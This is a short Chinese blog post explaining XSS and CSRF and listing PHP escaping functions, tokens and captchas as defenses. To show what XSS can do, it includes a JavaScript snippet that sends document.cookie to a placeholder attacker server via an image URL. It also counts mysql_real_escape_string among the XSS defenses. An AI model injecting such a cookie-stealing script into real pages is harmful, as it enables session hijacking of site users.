请写出预防xss(跨站脚本攻击)的函数 CSRF(跨站伪装访问)怎么预防

XSS又称CSS,全称CrossSiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等


  • xss攻击能做什么

  1. 窃取cookies,读取目标网站的cookie发送到黑客的服务器上,如下面的代码:
    var i=document.createElement(“img”);
    document.body.appendChild(i);
    i.src =”http://www.hackerserver.com/?c=” + document.cookie;
  2. 读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等。
  3. 前面两个是读的操作,其实还可进行写的操作,比如说:删除用户的博客,转发指定的微博,向用户的联系人发送带有恶意代码的信息,进行下一步的传播。
  • 防御攻击

    mysql_real_escape_string 函数转义 SQL 语句中使用的字符串中的特殊字符。
    htmlspecialchars 函数把预定义的字符转换为 HTML 实体。
    strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

  • 跨站伪装访问预防:

    a. 客户端加随机值 表单加token传值
    b. 增加验证码

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值